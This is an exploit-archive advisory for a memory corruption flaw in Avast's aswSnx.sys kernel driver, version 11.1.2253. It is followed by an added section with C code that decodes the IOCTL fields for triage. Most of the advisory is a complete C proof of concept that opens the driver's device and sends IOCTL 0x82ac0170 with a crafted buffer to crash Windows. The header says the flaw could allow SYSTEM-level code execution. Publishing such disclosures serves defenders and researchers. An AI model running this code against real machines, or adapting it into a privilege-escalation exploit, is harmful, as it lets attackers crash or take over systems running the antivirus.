Avast aswSnx.sys Kernel Driver 11.1.2253 Memory Corruption

2017-06-16T00:00:00
ID PACKETSTORM:142973
Type packetstorm
Reporter bee13oy
Modified 2017-06-16T00:00:00

Description

                                        
`/**
 * Author: bee13oy
 * BSoD on Windows 7 x86 / Windows 10 x86 + Avast Premier / Avast Free Antivirus (11.1.2253)
 * Source: https://github.com/bee13oy/AV_Kernel_Vulns/tree/master/Avast/aswSnx_BSoD2(ZDI-16-681)
 *
 * There is a memory corruption vulnerability in aswSnx.sys when the DeviceIoControl API is
 * called with ioctl number 0x82ac0170. An attacker may leverage this vulnerability to execute
 * arbitrary code in the context of SYSTEM.
 **/
  
#include <Windows.h>
#include <tchar.h>   /* _tmain and _TCHAR */

void BSoD(const char* szDeviceName)
{
    /* Open the device object exposed by aswSnx.sys */
    HANDLE hDevice = CreateFileA(szDeviceName,
                                 GENERIC_READ,
                                 0,
                                 NULL,
                                 OPEN_EXISTING,
                                 0,
                                 NULL);

    if (hDevice != INVALID_HANDLE_VALUE)
    {
        DWORD nbBytes = 0;
        /* 8-byte input buffer and 8-byte output buffer */
        CHAR bufInput[0x8+1] = "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a";
        CHAR bufOutput[0x8+1] = "";

        /* Send the ioctl that the driver mishandles */
        DeviceIoControl(hDevice,
                        0x82ac0170,
                        bufInput,
                        0x00000008,
                        bufOutput,
                        0x00000008,
                        &nbBytes,
                        NULL
                        );

        CloseHandle(hDevice);
    }
}

int _tmain(int argc, _TCHAR* argv[])
{
    BSoD("\\\\.\\aswSnx");

    return 0;
}
  
`
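
For triage, the control code named above can be split into the fields the Windows I/O manager reads from it. The following is an added example, not part of the original advisory or the author's repository; the helper names (decode_ioctl, access_name, method_name, any_access) are hypothetical, and the bit layout is the one defined by the WDK CTL_CODE macro.

```c
#include <stdint.h>
#include <stdio.h>

/* Windows packs an I/O control code as (WDK CTL_CODE macro):
 *   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method */
typedef struct {
    uint16_t device_type; /* bits 31..16 */
    uint8_t  access;      /* bits 15..14 */
    uint16_t function;    /* bits 13..2  */
    uint8_t  method;      /* bits 1..0   */
} ioctl_fields;

ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = (uint16_t)(code >> 16);
    f.access      = (uint8_t)((code >> 14) & 0x3);
    f.function    = (uint16_t)((code >> 2) & 0xFFF);
    f.method      = (uint8_t)(code & 0x3);
    return f;
}

const char *access_name(uint8_t a)
{
    static const char *n[] = { "FILE_ANY_ACCESS", "FILE_READ_ACCESS",
                               "FILE_WRITE_ACCESS", "FILE_READ_ACCESS|FILE_WRITE_ACCESS" };
    return n[a & 0x3];
}

const char *method_name(uint8_t m)
{
    static const char *n[] = { "METHOD_BUFFERED", "METHOD_IN_DIRECT",
                               "METHOD_OUT_DIRECT", "METHOD_NEITHER" };
    return n[m & 0x3];
}

/* Hypothetical triage helper: 1 if the code asks the I/O manager for no
 * read/write access check on the handle, leaving validation to the driver. */
int any_access(uint32_t code) { return decode_ioctl(code).access == 0; }

int main(void)
{
    uint32_t code = 0x82ac0170; /* control code named in the advisory */
    ioctl_fields f = decode_ioctl(code);
    printf("0x%08x: device=0x%04x function=0x%03x %s %s\n", (unsigned)code,
           (unsigned)f.device_type, (unsigned)f.function,
           access_name(f.access), method_name(f.method));
    return 0;
}
```

The code decodes to FILE_ANY_ACCESS with METHOD_BUFFERED, so the I/O manager applies no read/write access check to the handle for this request and the driver's dispatch routine is the only place the caller-supplied buffer and lengths get validated.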